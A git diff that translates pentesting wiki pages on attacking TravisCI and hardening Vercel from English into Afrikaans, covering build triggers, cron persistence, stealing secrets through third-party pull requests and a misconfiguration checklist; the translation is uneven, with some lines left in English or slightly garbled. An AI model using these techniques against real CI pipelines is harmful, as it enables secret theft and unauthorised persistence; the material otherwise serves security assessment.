-**Travis CI** is a **hosted** or on **premises** **continuous integration** service used to build and test software projects hosted on several **different git platform**.
+**Travis CI** is 'n **gehoste** of op **plek** **deurlopende integrasie** diens wat gebruik word om sagteware projekte te bou en te toets wat op verskeie **verskillende git platforms** gehost word.
 
 {{#ref}}
 basic-travisci-information.md
 {{#endref}}
 
-## Attacks
+## Aanvalle
 
 ### Triggers
 
-To launch an attack you first need to know how to trigger a build. By default TravisCI will **trigger a build on pushes and pull requests**:
+Om 'n aanval te begin, moet jy eers weet hoe om 'n bou te aktiveer. Standaard sal TravisCI **'n bou aktiveer op stoot en trek versoeke**:
 
 ![](<../../images/image (145).png>)
 
 #### Cron Jobs
 
-If you have access to the web application you can **set crons to run the build**, this could be useful for persistence or to trigger a build:
+As jy toegang het tot die webtoepassing, kan jy **crons stel om die bou te laat loop**, dit kan nuttig wees vir volharding of om 'n bou te aktiveer:
 
 ![](<../../images/image (243).png>)
 
 > [!NOTE]
-> It looks like It's not possible to set crons inside the `.travis.yml` according to [this](https://github.com/travis-ci/travis-ci/issues/9162).
+> Dit lyk of dit nie moontlik is om crons binne die `.travis.yml` in te stel nie volgens [dit](https://github.com/travis-ci/travis-ci/issues/9162).
 
-### Third Party PR
+### Derdeparty PR
 
-TravisCI by default disables sharing env variables with PRs coming from third parties, but someone might enable it and then you could create PRs to the repo and exfiltrate the secrets:
+TravisCI deaktiveer standaard die deel van omgewing veranderlikes met PR's wat van derde partye kom, maar iemand mag dit aktiveer en dan kan jy PR's na die repo skep en die geheime uitbring:
 
 ![](<../../images/image (208).png>)
 
 ### Dumping Secrets
 
-As explained in the [**basic information**](basic-travisci-information.md) page, there are 2 types of secrets. **Environment Variables secrets** (which are listed in the web page) and **custom encrypted secrets**, which are stored inside the `.travis.yml` file as base64 (note that both as stored encrypted will end as env variables in the final machines).
+Soos verduidelik in die [**basiese inligting**](basic-travisci-information.md) bladsy, is daar 2 tipes geheime. **Omgewing Veranderlikes geheime** (wat op die webblad gelys is) en **aangepaste versleutelde geheime**, wat binne die `.travis.yml` lêer as base64 gestoor word (let daarop dat albei as versleuteld gestoor sal eindig as omgewing veranderlikes in die finale masjiene).
 
-- To **enumerate secrets** configured as **Environment Variables** go to the **settings** of the **project** and check the list. However, note that all the project env variables set here will appear when triggering a build.
-- To enumerate the **custom encrypted secrets** the best you can do is to **check the `.travis.yml` file**.
-- To **enumerate encrypted files** you can check for **`.enc` files** in the repo, for lines similar to `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in the config file, or for **encrypted iv and keys** in the **Environment Variables** such as:
+- Om **geheime** wat as **Omgewing Veranderlikes** geconfigureer is te **nommer**, gaan na die **instellings** van die **projek** en kyk na die lys. Let egter daarop dat al die projek omgewing veranderlikes wat hier gestel is, sal verskyn wanneer 'n bou geaktiveer word.
+- Om die **aangepaste versleutelde geheime** te nommer, is die beste wat jy kan doen om die **`.travis.yml` lêer** te **kontroleer**.
+- Om **versleutelde lêers** te nommer, kan jy kyk vir **`.enc` lêers** in die repo, vir lyne soortgelyk aan `openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d` in die konfigurasielêer, of vir **versleutelde iv en sleutels** in die **Omgewing Veranderlikes** soos:
 
 ![](<../../images/image (81).png>)
 
 ### TODO:
 
-- Example build with reverse shell running on Windows/Mac/Linux
-- Example build leaking the env base64 encoded in the logs
+- Voorbeeld bou met omgekeerde skulp wat op Windows/Mac/Linux loop
+- Voorbeeld bou wat die omgewing base64 geënkodeer in die logs lek
 
 ### TravisCI Enterprise
 
-If an attacker ends in an environment which uses **TravisCI enterprise** (more info about what this is in the [**basic information**](basic-travisci-information.md#travisci-enterprise)), he will be able to **trigger builds in the the Worker.** This means that an attacker will be able to move laterally to that server from which he could be able to:
+As 'n aanvaller in 'n omgewing eindig wat **TravisCI enterprise** gebruik (meer inligting oor wat dit is in die [**basiese inligting**](basic-travisci-information.md#travisci-enterprise)), sal hy in staat wees om **bou te aktiveer in die Werker.** Dit beteken dat 'n aanvaller in staat sal wees om lateraal na daardie bediener te beweeg waarvandaan hy in staat sal wees om:
 
-- escape to the host?
-- compromise kubernetes?
-- compromise other machines running in the same network?
-- compromise new cloud credentials?
+- na die gasheer te ontsnap?
+- kubernetes te kompromitteer?
+- ander masjiene wat in dieselfde netwerk loop te kompromitteer?
+- nuwe wolk geloofsbriewe te kompromitteer?
 
-## References
+## Verwysings
 
 - [https://docs.travis-ci.com/user/encrypting-files/](https://docs.travis-ci.com/user/encrypting-files/)
 - [https://docs.travis-ci.com/user/best-practices-security](https://docs.travis-ci.com/user/best-practices-security)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
index 46b10bf38..6ff1e3ac2 100644
--- a/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
+++ b/src/pentesting-ci-cd/travisci-security/basic-travisci-information.md
@@ -2,47 +2,44 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Access
+## Toegang
 
-TravisCI directly integrates with different git platforms such as Github, Bitbucket, Assembla, and Gitlab. It will ask the user to give TravisCI permissions to access the repos he wants to integrate with TravisCI.
+TravisCI integreer direk met verskillende git platforms soos Github, Bitbucket, Assembla, en Gitlab. Dit sal die gebruiker vra om TravisCI toestemming te gee om toegang te verkry tot die repos wat hy wil integreer met TravisCI.
 
-For example, in Github it will ask for the following permissions:
+Byvoorbeeld, in Github sal dit vir die volgende toestemmings vra:
 
-- `user:email` (read-only)
-- `read:org` (read-only)
-- `repo`: Grants read and write access to code, commit statuses, collaborators, and deployment statuses for public and private repositories and organizations.
+- `user:email` (slegs lees)
+- `read:org` (slegs lees)
+- `repo`: Gee lees- en skryftoegang tot kode, verbintenisstatusse, samewerkers, en ontplooiingstatusse vir openbare en private repositories en organisasies.
 
-## Encrypted Secrets
+## Geënkripteerde Geheime
 
-### Environment Variables
+### Omgewing Veranderlikes
 
-In TravisCI, as in other CI platforms, it's possible to **save at repo level secrets** that will be saved encrypted and be **decrypted and push in the environment variable** of the machine executing the build.
+In TravisCI, soos in ander CI platforms, is dit moontlik om **geheime op repo vlak te stoor** wat geënkripteer gestoor sal word en **ontsleutel en in die omgewing veranderlike** van die masjien wat die bou uitvoer, gepush sal word.
 
 ![](<../../images/image (203).png>)
 
-It's possible to indicate the **branches to which the secrets are going to be available** (by default all) and also if TravisCI **should hide its value** if it appears **in the logs** (by default it will).
+Dit is moontlik om die **takke aan te dui waartoe die geheime beskikbaar gaan wees** (standaard is dit alles) en ook of TravisCI **sy waarde moet wegsteek** as dit **in die logs** verskyn (standaard sal dit).
 
-### Custom Encrypted Secrets
+### Pasgemaakte Geënkripteerde Geheime
 
-For **each repo** TravisCI generates an **RSA keypair**, **keeps** the **private** one, and makes the repository’s **public key available** to those who have **access** to the repository.
-
-You can access the public key of one repo with:
+Vir **elke repo** genereer TravisCI 'n **RSA sleutelpaar**, **hou** die **privaat** een, en maak die repository se **publieke sleutel beskikbaar** vir diegene wat **toegang** tot die repository het.
 
+Jy kan die publieke sleutel van een repo met toegang:
 ```
 travis pubkey -r <owner>/<repo_name>
 travis pubkey -r carlospolop/t-ci-test
 ```
-
-Then, you can use this setup to **encrypt secrets and add them to your `.travis.yaml`**. The secrets will be **decrypted when the build is run** and accessible in the **environment variables**.
+Dan kan jy hierdie opstelling gebruik om **geheime te enkripteer en dit by jou `.travis.yaml` te voeg**. Die geheime sal **ontsleuteld word wanneer die bou gedoen word** en toeganklik wees in die **omgewing veranderlikes**.
 
 ![](<../../images/image (139).png>)
 
-Note that the secrets encrypted this way won't appear listed in the environmental variables of the settings.
+Let daarop dat die geheime wat op hierdie manier geënkripteer is, nie in die omgewing veranderlikes van die instellings gelys sal word nie.
 
-### Custom Encrypted Files
-
-Same way as before, TravisCI also allows to **encrypt files and then decrypt them during the build**:
+### Pasgemaakte Geënkripteerde Lêers
 
+Op dieselfde manier as voorheen, laat TravisCI ook toe om **lêers te enkripteer en dit tydens die bou te ontsleutel**:
 ```
 travis encrypt-file super_secret.txt -r carlospolop/t-ci-test
 
@@ -52,7 +49,7 @@ storing secure env variables for decryption
 
 Please add the following to your build script (before_install stage in your .travis.yml, for instance):
 
-    openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
+openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d
 
 Pro Tip: You can add it automatically by running with --add.
 
@@ -60,37 +57,32 @@ Make sure to add super_secret.txt.enc to the git repository.
 Make sure not to add super_secret.txt to the git repository.
 Commit all changes to your .travis.yml.
 ```
-
 Note that when encrypting a file 2 Env Variables will be configured inside the repo such as:
 
 ![](<../../images/image (170).png>)
 
 ## TravisCI Enterprise
 
-Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deploy **in your infrastructure**. Think of the ‘server’ version of Travis CI. Using Travis CI allows you to enable an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment, which you can configure and secure as you want to.
+Travis CI Enterprise is 'n **on-prem weergawe van Travis CI**, wat jy kan ontplooi **in jou infrastruktuur**. Dink aan die ‘bediener’ weergawe van Travis CI. Deur Travis CI te gebruik, kan jy 'n maklik-om-te-gebruik Kontinuïteitsintegrasie/Kontinuïteitsontplooiing (CI/CD) stelsel in 'n omgewing inskakel, wat jy kan konfigureer en beveilig soos jy wil.
 
-**Travis CI Enterprise consists of two major parts:**
+**Travis CI Enterprise bestaan uit twee hoofdele:**
 
-1. TCI **services** (or TCI Core Services), responsible for integration with version control systems, authorizing builds, scheduling build jobs, etc.
-2. TCI **Worker** and build environment images (also called OS images).
+1. TCI **dienste** (of TCI Kern Dienste), verantwoordelik vir integrasie met weergawebeheer stelsels, die autorisering van boue, die skedulering van bouwerk, ens.
+2. TCI **Werker** en bou omgewing beelde (ook genoem OS beelde).
 
-**TCI Core services require the following:**
+**TCI Kern dienste vereis die volgende:**
 
-1. A **PostgreSQL11** (or later) database.
-2. An infrastructure to deploy a Kubernetes cluster; it can be deployed in a server cluster or in a single machine if required
-3. Depending on your setup, you may want to deploy and configure some of the components on your own, e.g., RabbitMQ - see the [Setting up Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) for more details.
+1. 'n **PostgreSQL11** (of later) databasis.
+2. 'n infrastruktuur om 'n Kubernetes-kluster te ontplooi; dit kan in 'n bedienerkluster of op 'n enkele masjien ontplooi word indien nodig.
+3. Afhangende van jou opstelling, wil jy dalk sommige van die komponente op jou eie ontplooi en konfigureer, bv. RabbitMQ - sien die [Instelling van Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) vir meer besonderhede.
 
-**TCI Worker requires the following:**
+**TCI Werker vereis die volgende:**
 
-1. An infrastructure where a docker image containing the **Worker and a linked build image can be deployed**.
-2. Connectivity to certain Travis CI Core Services components - see the [Setting Up Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) for more details.
+1. 'n infrastruktuur waar 'n docker beeld wat die **Werker en 'n gekoppelde boubeeld kan ontplooi**.
+2. Verbondenheid met sekere Travis CI Kern Dienste komponente - sien die [Instelling van Werker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) vir meer besonderhede.
 
-The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure.
+Die hoeveelheid ontplooide TCI Werker en bou omgewing OS beelde sal die totale gelyktydige kapasiteit van Travis CI Enterprise ontplooiing in jou infrastruktuur bepaal.
 
 ![](<../../images/image (199).png>)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/vercel-security.md b/src/pentesting-ci-cd/vercel-security.md
index 16dc93da7..23d655946 100644
--- a/src/pentesting-ci-cd/vercel-security.md
+++ b/src/pentesting-ci-cd/vercel-security.md
@@ -12,152 +12,149 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
 
 ### General
 
-**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations.
+**Purpose:** Bestuur fundamentele projekinstellings soos projeknaam, raamwerk, en boukonfigurasies.
 
 #### Security Configurations:
 
 - **Transfer**
-  - **Misconfiguration:** Allows to transfer the project to another team
-  - **Risk:** An attacker could steal the project
+- **Misconfiguration:** Laat toe om die projek na 'n ander span oor te dra
+- **Risk:** 'n Aanvaller kan die projek steel
 - **Delete Project**
-  - **Misconfiguration:** Allows to delete the project&#x20;
-  - **Risk:** Delete the prject
+- **Misconfiguration:** Laat toe om die projek te verwyder
+- **Risk:** Verwyder die projek
 
 ---
 
 ### Domains
 
-**Purpose:** Manage custom domains, DNS settings, and SSL configurations.
+**Purpose:** Bestuur pasgemaakte domeine, DNS-instellings, en SSL-konfigurasies.
 
 #### Security Configurations:
 
 - **DNS Configuration Errors**
-  - **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers.
-  - **Risk:** Domain hijacking, traffic interception, and phishing attacks.
+- **Misconfiguration:** Onakkurate DNS rekords (A, CNAME) wat na kwaadwillige bedieners wys.
+- **Risk:** Domein kaap, verkeersafluistering, en phishing-aanvalle.
 - **SSL/TLS Certificate Management**
-  - **Misconfiguration:** Using weak or expired SSL/TLS certificates.
-  - **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality.
+- **Misconfiguration:** Gebruik van swak of vervalde SSL/TLS sertifikate.
+- **Risk:** Kwetsbaar vir man-in-the-middle (MITM) aanvalle, wat data-integriteit en vertroulikheid in gevaar stel.
 - **DNSSEC Implementation**
-  - **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings.
-  - **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks.
+- **Misconfiguration:** Versuim om DNSSEC in te skakel of onakkurate DNSSEC-instellings.
+- **Risk:** Verhoogde kwesbaarheid vir DNS spoofing en cache vergiftiging aanvalle.
 - **Environment used per domain**
-  - **Misconfiguration:** Change the environment used by the domain in production.
-  - **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production.
+- **Misconfiguration:** Verander die omgewing wat deur die domein in produksie gebruik word.
+- **Risk:** Stel potensiële geheime of funksies bloot wat nie in produksie beskikbaar moet wees nie.
 
 ---
 
 ### Environments
 
-**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables.
+**Purpose:** Definieer verskillende omgewings (Ontwikkeling, Voorbeeld, Produksie) met spesifieke instellings en veranderlikes.
 
 #### Security Configurations:
 
 - **Environment Isolation**
-  - **Misconfiguration:** Sharing environment variables across environments.
-  - **Risk:** Leakage of production secrets into development or preview environments, increasing exposure.
+- **Misconfiguration:** Deel omgewing veranderlikes oor omgewings.
+- **Risk:** Lek van produksie geheime in ontwikkeling of voorbeeld omgewings, wat blootstelling verhoog.
 - **Access to Sensitive Environments**
-  - **Misconfiguration:** Allowing broad access to production environments.
-  - **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches.
+- **Misconfiguration:** Laat breë toegang tot produksie omgewings toe.
+- **Risk:** Ongeoorloofde veranderinge of toegang tot lewendige toepassings, wat tot potensiële stilstand of datalekke kan lei.
 
 ---
 
 ### Environment Variables
 
-**Purpose:** Manage environment-specific variables and secrets used by the application.
+**Purpose:** Bestuur omgewing-spesifieke veranderlikes en geheime wat deur die toepassing gebruik word.
 
 #### Security Configurations:
 
 - **Exposing Sensitive Variables**
-  - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
-  - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
+- **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
+- **Risk:** Blootstelling van API sleutels, databasis akrediteer, of ander sensitiewe data aan die publiek, wat tot datalekke lei.
 - **Sensitive disabled**
-  - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
-  - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
-- **Shared Environment Variables**
-  - **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information.
-  - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+- **Misconfiguration:** As gedeaktiveer (standaard) is dit moontlik om die waardes van die gegenereerde geheime te lees.
+- **Risk:** Verhoogde waarskynlikheid van toevallige blootstelling of ongeoorloofde toegang tot sensitiewe inligting.
 
 ---
 
 ### Git
 
-**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers.
+**Purpose:** Konfigureer Git-repository integrasies, tak beskermings, en ontplooiing triggers.
 
 #### Security Configurations:
 
 - **Ignored Build Step (TODO)**
-  - **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE.
-  - **Risk:** TBD
+- **Misconfiguration:** Dit lyk of hierdie opsie toelaat om 'n bash skrip/opdragte te konfigureer wat uitgevoer sal word wanneer 'n nuwe verbintenis in Github gepush word, wat RCE kan toelaat.
+- **Risk:** TBD
 
 ---
 
 ### Integrations
 
-**Purpose:** Connect third-party services and tools to enhance project functionalities.
+**Purpose:** Koppel derdeparty dienste en gereedskap om projek funksionaliteit te verbeter.
 
 #### Security Configurations:
 
 - **Insecure Third-Party Integrations**
-  - **Misconfiguration:** Integrating with untrusted or insecure third-party services.
-  - **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations.
+- **Misconfiguration:** Integrasie met onbetroubare of onveilige derdeparty dienste.
+- **Risk:** Invoering van kwesbaarhede, datalekke, of agterdeure deur gekompromitteerde integrasies.
 - **Over-Permissioned Integrations**
-  - **Misconfiguration:** Granting excessive permissions to integrated services.
-  - **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions.
+- **Misconfiguration:** Te veel toestemmings aan geïntegreerde dienste toeken.
+- **Risk:** Ongeoorloofde toegang tot projek hulpbronne, data manipulasie, of diensonderbrekings.
 - **Lack of Integration Monitoring**
-  - **Misconfiguration:** Failing to monitor and audit third-party integrations.
-  - **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches.
+- **Misconfiguration:** Versuim om derdeparty integrasies te monitor en te oudit.
+- **Risk:** Vertraagde opsporing van gekompromitteerde integrasies, wat die potensiële impak van sekuriteitsbreuke verhoog.
 
 ---
 
 ### Deployment Protection
 
-**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments.
+**Purpose:** Beveilig ontplooiings deur verskeie beskermingsmeganismes, wat beheer wie toegang kan hê en ontplooiing na jou omgewings kan doen.
 
 #### Security Configurations:
 
 **Vercel Authentication**
 
-- **Misconfiguration:** Disabling authentication or not enforcing team member checks.
-- **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse.
+- **Misconfiguration:** Deaktiveer autentisering of nie afdwing van spanlid kontroles nie.
+- **Risk:** Ongeoorloofde gebruikers kan toegang tot ontplooiings verkry, wat tot datalekke of toepassingsmisbruik kan lei.
 
 **Protection Bypass for Automation**
 
-- **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets.
-- **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments.
+- **Misconfiguration:** Blootstelling van die omseil geheime publiek of gebruik van swak geheime.
+- **Risk:** Aanvallers kan ontplooiing beskermings omseil, toegang tot en manipulasie van beskermde ontplooiings verkry.
 
 **Shareable Links**
 
-- **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links.
-- **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions.
+- **Misconfiguration:** Deel skakels sonder onderskeid of versuim om verouderde skakels in te trek.
+- **Risk:** Ongeoorloofde toegang tot beskermde ontplooiings, wat autentisering en IP-beperkings omseil.
 
 **OPTIONS Allowlist**
 
-- **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints.
-- **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks.
+- **Misconfiguration:** Laat te breë paaie of sensitiewe eindpunte toe.
+- **Risk:** Aanvallers kan onbeskermde paaie benut om ongeoorloofde aksies uit te voer of sekuriteitskontroles om te se.
 
 **Password Protection**
 
-- **Misconfiguration:** Using weak passwords or sharing them insecurely.
-- **Risk:** Unauthorized access to deployments if passwords are guessed or leaked.
-- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
+- **Misconfiguration:** Gebruik van swak wagwoorde of om dit onveilig te deel.
+- **Risk:** Ongeoorloofde toegang tot ontplooiings as wagwoorde geraai of gelekt word.
+- **Note:** Beskikbaar op die **Pro** plan as deel van **Advanced Deployment Protection** vir 'n addisionele $150/maand.
 
 **Deployment Protection Exceptions**
 
-- **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently.
-- **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access.
-- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month.
+- **Misconfiguration:** Voeg produksie of sensitiewe domeine per ongeluk by die uitsonderingslys.
+- **Risk:** Blootstelling van kritieke ontplooiings aan die publiek, wat tot datalekke of ongeoorloofde toegang kan lei.
+- **Note:** Beskikbaar op die **Pro** plan as deel van **Advanced Deployment Protection** vir 'n addisionele $150/maand.
 
 **Trusted IPs**
 
-- **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges.
-- **Risk:** Legitimate users being blocked or unauthorized IPs gaining access.
-- **Note:** Available on the **Enterprise** plan.
+- **Misconfiguration:** Onakkuraat spesifisering van IP adresse of CIDR reekse.
+- **Risk:** Legitieme gebruikers wat geblokkeer word of ongeoorloofde IPs wat toegang verkry.
+- **Note:** Beskikbaar op die **Enterprise** plan.
 
 ---
 
 ### Functions
 
-**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies.
+**Purpose:** Konfigureer serverless funksies, insluitend runtime instellings, geheue toewysing, en sekuriteitsbeleide.
 
 #### Security Configurations:
 
@@ -167,81 +164,81 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
 
 ### Data Cache
 
-**Purpose:** Manage caching strategies and settings to optimize performance and control data storage.
+**Purpose:** Bestuur caching strategieë en instellings om prestasie te optimaliseer en data berging te beheer.
 
 #### Security Configurations:
 
 - **Purge Cache**
-  - **Misconfiguration:** It allows to delete all the cache.
-  - **Risk:** Unauthorized users deleting the cache leading to a potential DoS.
+- **Misconfiguration:** Dit laat toe om al die cache te verwyder.
+- **Risk:** Ongeoorloofde gebruikers wat die cache verwyder, wat tot 'n potensiële DoS kan lei.
 
 ---
 
 ### Cron Jobs
 
-**Purpose:** Schedule automated tasks and scripts to run at specified intervals.
+**Purpose:** Skeduleer geoutomatiseerde take en skripte om op spesifieke tydperke te loop.
 
 #### Security Configurations:
 
 - **Disable Cron Job**
-  - **Misconfiguration:** It allows to disable cron jobs declared inside the code
-  - **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for)
+- **Misconfiguration:** Dit laat toe om cron jobs wat in die kode verklaar is, te deaktiveer.
+- **Risk:** Potensiële onderbreking van die diens (afhangende van waarvoor die cron jobs bedoel was)
 
 ---
 
 ### Log Drains
 
-**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing.
+**Purpose:** Konfigureer eksterne logging dienste om toepassingslogs te vang en te stoor vir monitering en oudit.
 
 #### Security Configurations:
 
-- Nothing (managed from teams settings)
+- Niks (bestuur vanaf spaninstellings)
 
 ---
 
 ### Security
 
-**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more.
+**Purpose:** Sentraal hub vir verskeie sekuriteitsverwante instellings wat projek toegang, bron beskerming, en meer beïnvloed.
 
 #### Security Configurations:
 
 **Build Logs and Source Protection**
 
-- **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly.
-- **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities.
+- **Misconfiguration:** Deaktiveer beskerming of blootstelling van `/logs` en `/src` paaie publiek.
+- **Risk:** Ongeoorloofde toegang tot boulogs en bronkode, wat tot inligtinglekke en potensiële uitbuiting van kwesbaarhede kan lei.
 
 **Git Fork Protection**
 
-- **Misconfiguration:** Allowing unauthorized pull requests without proper reviews.
-- **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors.
+- **Misconfiguration:** Laat ongeoorloofde pull versoeke toe sonder behoorlike hersienings.
+- **Risk:** Kwaadwillige kode kan in die kodebasis saamgevoeg word, wat kwesbaarhede of agterdeure inbring.
 
 **Secure Backend Access with OIDC Federation**
 
-- **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs.
-- **Risk:** Unauthorized access to backend services through flawed authentication flows.
+- **Misconfiguration:** Onakkurate opstelling van OIDC parameters of gebruik van onveilige issuer URL's.
+- **Risk:** Ongeoorloofde toegang tot agtergrond dienste deur gebrekkige autentisering vloei.
 
 **Deployment Retention Policy**
 
-- **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention).
-- **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments.
+- **Misconfiguration:** Stel retensieperiodes te kort (verlies van ontplooiing geskiedenis) of te lank (onnodige data retensie).
+- **Risk:** Onvermoë om terug te rol wanneer nodig of verhoogde risiko van datablootstelling van ou ontplooiings.
 
 **Recently Deleted Deployments**
 
-- **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions.
-- **Risk:** Loss of critical deployment history, hindering audits and rollbacks.
+- **Misconfiguration:** Nie monitering van verwyderde ontplooiings of slegs op outomatiese verwyderings vertrou nie.
+- **Risk:** Verlies van kritieke ontplooiing geskiedenis, wat oudit en terugrols bemoeilik.
 
 ---
 
 ### Advanced
 
-**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security.
+**Purpose:** Toegang tot addisionele projekinstellings vir fyninstelling van konfigurasies en verbetering van sekuriteit.
 
 #### Security Configurations:
 
 **Directory Listing**
 
-- **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file.
-- **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks.
+- **Misconfiguration:** Aktivering van gidslys laat gebruikers toe om gidsinhoud te sien sonder 'n indekslêer.
+- **Risk:** Blootstelling van sensitiewe lêers, toepassingsstruktuur, en potensiële toegangspunte vir aanvalle.
 
 ---
 
@@ -253,13 +250,13 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
 
 **Enable Attack Challenge Mode**
 
-- **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability
-- **Risk:** Potential user experience problems.
+- **Misconfiguration:** Aktivering hiervan verbeter die verdediging van die webtoepassing teen DoS, maar ten koste van bruikbaarheid.
+- **Risk:** Potensiële gebruikerservaring probleme.
 
 ### Custom Rules & IP Blocking
 
-- **Misconfiguration:** Allows to unblock/block traffic
-- **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic
+- **Misconfiguration:** Laat toe om verkeer te ontbloek/blokkeer.
+- **Risk:** Potensiële DoS wat kwaadwillige verkeer toelaat of goedaardige verkeer blokkeer.
 
 ---
 
@@ -267,13 +264,13 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
 
 ### Source
 
-- **Misconfiguration:** Allows access to read the complete source code of the application
-- **Risk:** Potential exposure of sensitive information
+- **Misconfiguration:** Laat toegang toe om die volledige bronkode van die toepassing te lees.
+- **Risk:** Potensiële blootstelling van sensitiewe inligting.
 
 ### Skew Protection
 
-- **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other.
-- **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future
+- **Misconfiguration:** Hierdie beskerming verseker dat die kliënt en bediener toepassing altyd dieselfde weergawe gebruik sodat daar geen desynchronisasies is waar die kliënt 'n ander weergawe as die bediener gebruik nie en daarom verstaan hulle mekaar nie.
+- **Risk:** Deaktivering hiervan (as geaktiveer) kan DoS probleme in nuwe ontplooiings in die toekoms veroorsaak.
 
 ---
 
@@ -284,11 +281,11 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
 #### Security Configurations:
 
 - **Transfer**
-  - **Misconfiguration:** Allows to transfer all the projects to another team
-  - **Risk:** An attacker could steal the projects
+- **Misconfiguration:** Laat toe om al die projekte na 'n ander span oor te dra.
+- **Risk:** 'n Aanvaller kan die projekte steel.
 - **Delete Project**
-  - **Misconfiguration:** Allows to delete the team with all the projects&#x20;
-  - **Risk:** Delete the projects
+- **Misconfiguration:** Laat toe om die span met al die projekte te verwyder.
+- **Risk:** Verwyder die projekte.
 
 ---
 
@@ -297,8 +294,8 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
 #### Security Configurations:
 
 - **Speed Insights Cost Limit**
-  - **Misconfiguration:** An attacker could increase this number
-  - **Risk:** Increased costs
+- **Misconfiguration:** 'n Aanvaller kan hierdie nommer verhoog.
+- **Risk:** Verhoogde koste.
 
 ---
 
@@ -307,11 +304,11 @@ For a hardening review of **Vercel** you need to ask for a user with **Viewer ro
 #### Security Configurations:
 
 - **Add members**
-  - **Misconfiguration:** An attacker could maintain persitence inviting an account he control
-  - **Risk:** Attacker persistence
+- **Misconfiguration:** 'n Aanvaller kan volharding handhaaf deur 'n rekening wat hy beheer, uit te nooi.
+- **Risk:** Aanvaller volharding.
 - **Roles**
